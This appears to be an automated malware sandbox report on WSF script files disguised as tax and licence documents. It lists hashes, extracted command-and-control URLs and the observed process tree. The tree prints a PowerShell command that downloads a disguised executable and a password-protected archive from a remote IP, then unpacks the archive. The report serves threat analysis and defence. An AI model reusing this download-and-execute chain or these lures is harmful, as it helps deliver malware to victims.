Overview
overview
10Static
static
12O22-Tax-Returns.wsf
windows7-x64
102O22-Tax-Returns.wsf
windows10-2004-x64
10DRlVERS-LlCENSE.wsf
windows7-x64
10DRlVERS-LlCENSE.wsf
windows10-2004-x64
10PR0FlT&L0SS_2O23.wsf
windows7-x64
10PR0FlT&L0SS_2O23.wsf
windows10-2004-x64
10ScheduIe-K.wsf
windows7-x64
10ScheduIe-K.wsf
windows10-2004-x64
10Analysis
-
max time kernel
0s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
24-01-2024 04:21
Static task
static1
Behavioral task
behavioral1
Sample
2O22-Tax-Returns.wsf
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
2O22-Tax-Returns.wsf
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
DRlVERS-LlCENSE.wsf
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
DRlVERS-LlCENSE.wsf
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
PR0FlT&L0SS_2O23.wsf
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
PR0FlT&L0SS_2O23.wsf
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
ScheduIe-K.wsf
Resource
win7-20231129-en
General
-
Target
ScheduIe-K.wsf
-
Size
4KB
-
MD5
eafa5d2bdb1f8bca65b208d7e6101e1c
-
SHA1
da7085b340e3b02d94bb4acc92ee9475133b7948
-
SHA256
572a90ba88b5424d527785d48667dfd95293469b07ab016970b7253e2bb5d0d0
-
SHA512
2114d0dda32e2224c8253a9ec038b6f212a01082bb73222780391e0842a73097c57454f248135671f67662f419bba9c5cbb7721a1eba6790eb59381e7a4bbda8
-
SSDEEP
96:021JYd1k2ig3AwYx4wg3CWPqrHekw21JYd1k2ig3AwYx4wg3CWPqrHek4:Np2ioAwYgSWPqTeGp2ioAwYgSWPqTeB
Malware Config
Extracted
http://176.107.185.29:666/Rar.jpg
http://176.107.185.29:666/load.rar
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
WScript.exeflow pid process 3 2316 WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 2316 wrote to memory of 2132 2316 WScript.exe powershell.exe PID 2316 wrote to memory of 2132 2316 WScript.exe powershell.exe PID 2316 wrote to memory of 2132 2316 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ScheduIe-K.wsf"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-BitsTransfer -Source 'http://176.107.185.29:666/Rar.jpg' -Destination 'C:\Users\Public\Rar.exe'; Start-BitsTransfer -Source 'http://176.107.185.29:666/load.rar' -Destination 'C:\Users\Public\load.rar'"2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Rar.exe x -p111 load.rar2⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2132-8-0x00000000021D0000-0x00000000021D8000-memory.dmpFilesize
32KB
-
memory/2132-7-0x000000001B610000-0x000000001B8F2000-memory.dmpFilesize
2.9MB
-
memory/2132-9-0x000007FEF5B90000-0x000007FEF652D000-memory.dmpFilesize
9.6MB
-
memory/2132-12-0x0000000002D00000-0x0000000002D80000-memory.dmpFilesize
512KB
-
memory/2132-13-0x0000000002D00000-0x0000000002D80000-memory.dmpFilesize
512KB
-
memory/2132-11-0x000007FEF5B90000-0x000007FEF652D000-memory.dmpFilesize
9.6MB
-
memory/2132-10-0x0000000002D00000-0x0000000002D80000-memory.dmpFilesize
512KB
-
memory/2132-14-0x000007FEF5B90000-0x000007FEF652D000-memory.dmpFilesize
9.6MB